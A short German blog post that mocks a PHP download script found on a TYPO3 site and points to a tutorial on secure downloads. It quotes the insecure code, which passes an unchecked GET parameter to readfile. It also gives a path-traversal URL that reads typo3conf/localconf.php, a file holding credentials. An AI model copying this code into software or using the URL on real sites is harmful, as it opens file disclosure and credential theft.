Mal wieder bei meinem sonntäglichen Spass was lustiges gefunden. :O)

Was so selbsternannten Programmierer für Zeuch koten:
<?php
$_GET['file'] = urldecode($_GET['file']);
if(is_file('./uploads/media/'.$_GET['file'])) {
    header("Content-type: application/pdf");
    header("Content-Disposition: attachment;
      filename=downloaded.pdf");
    readfile('./uploads/media/'.$_GET['file']);
}
?>

Das Script steckt in einer Website die TYPO3 benutzt. Da könnte man mit
http://domain/dau.php?file=../../typo3conf/localconf.php
schnell zum Ziel kommen. ;O)


Wer ein Download-Script selber coden möchte, der kann sich dies mal anschauen:
“Dateidownload realisieren” (selfphp.de)

Es wird auch erklärt worauf man achten muss, damit eben nicht das obige Malheur passiert.